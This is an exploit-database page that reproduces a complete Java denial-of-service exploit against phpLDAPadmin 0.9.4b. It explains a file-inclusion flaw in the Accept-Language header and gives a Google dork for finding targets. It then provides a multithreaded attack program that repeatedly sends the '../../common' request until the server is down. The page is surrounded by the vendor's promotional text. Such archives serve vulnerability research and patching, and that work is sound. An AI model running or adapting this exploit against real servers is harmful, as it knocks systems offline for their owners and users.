Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpLDAPadmin 0.9.4b - Denial of Service

🗓️ 23 Oct 2011 00:00:00Reported by AlguienType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 32 Views

phpLDAPadmin 0.9.4b Denial of Service vulnerability exploi

Code
/**
 * Exploit Title: phpLDAPadmin 0.9.4b DoS
 * Google Dork: "phpLDAPadmin - 0.9.4b"
 * Date: 2011-10-23
 * Author: Alguien
 * Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/
 * Version: 0.9.4b
 * Tested on: Red Hat
 * CVE : -
 * 
 * Compilation:
 * ------------ 
 * $ javac phpldos.java
 * 
 * Usage:
 * ------ 
 * $ java phpldos <host> <path> <threads>
 * 
 * Example:
 * -------- 
 * $ java phpldos www.example.com /phpldapadmin/ 10
 * 
 * Explanation:
 * ------------ 
 * The file "common.php" is vulnerable to LFI through the "Accept-Language"
 * HTTP header.
 * 
 * if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
 * 	// get the languages which are spetcified in the HTTP header
 * 	$HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
 * 	$HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
 * 	foreach( $HTTP_LANGS2 as $key => $value ) {
 * 		$value=preg_split ("/[-]+/", $value );
 * 		$HTTP_LANGS2[$key]=$value[0];
 * 	}
 * 
 * 	$HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2);
 * 	foreach( $HTTP_LANGS as $HTTP_LANG) {
 * 		// try to grab one after the other the language file
 * 		if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) &&
 * 		is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) {
 * 			ob_start();
 * 			include realpath( "lang/recoded/$HTTP_LANG.php" );
 * 			ob_end_clean();
 * 			break;
 * 		}
 * 	}
 * }
 * 
 * This exploit sends "../../common" in the Accept-Language header in order to
 * generate a recursive inclusions and cause a denial of service via resource
 * exhaustion.
 * 
 * GET /phpldapadmin/common.php HTTP/1.1\r\n
 * Host: www.example.com\r\n
 * Accept-Language: ../../common\r\n
 * Connection: close\r\n
 * \r\n
 * 
 */
import java.io.PrintStream;
import java.net.InetSocketAddress;
import java.net.Socket;

class phpldos implements Runnable {

    public static final int HTTP_PORT = 80;
    public static final int TIMEOUT = 10000;
    private static String host;
    private static String path;
    private Socket sk;
    private PrintStream ps;

    public void run() {
        while (true) {
            if (!open_connection()) {
                System.out.println("[+] Mission complete. Server is down };]");
                break;
            }
            send_attack();
            try {
                ps.close();
                sk.close();
            } catch (Exception e) {
                // D'oh!
            }
        }
    }

    private boolean open_connection() {
        try {
            sk = new Socket();
            sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT);
            ps = new PrintStream(sk.getOutputStream());
        } catch (Exception e) {
            return false;
        }
        return true;
    }

    private void send_attack() {
        try {
            String message = ""
                    + "GET " + path + "common.php HTTP/1.1\r\n"
                    + "Host: " + host + "\r\n"
                    + "Accept-Language: ../../common\r\n"
                    + "Connection: close\r\n"
                    + "\r\n";
            ps.print(message);
        } catch (Exception e) {
            // D'oh!
        }
    }

    public static void main(String[] args) {
        if (args.length != 3) {
            usage();
        }
        host = args[0];
        path = args[1];
        int threads = Integer.parseInt(args[2]);
        System.out.println("[+] Attacking with " + threads + " threads.");
        for (int i = 0; i < threads; i++) {
            new Thread(new phpldos()).start();
        }
    }

    public static void usage() {
        System.out.print(
                "###########################################################\n"
                + "#                    phpLDAPadmin DoS                     #\n"
                + "#    by: Alguien - http://alguienenlafisi.blogspot.com    #\n"
                + "###########################################################\n"
                + "Syntax  : java phpldos <host> <path> <threads>\n"
                + "Example : java phpldos www.example.com /phpldapadmin/ 10\n\n");
        System.exit(1);
    }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Oct 2011 00:00Current
7High risk
Vulners AI Score7
phpldapadmindenial of servicevulnerability
32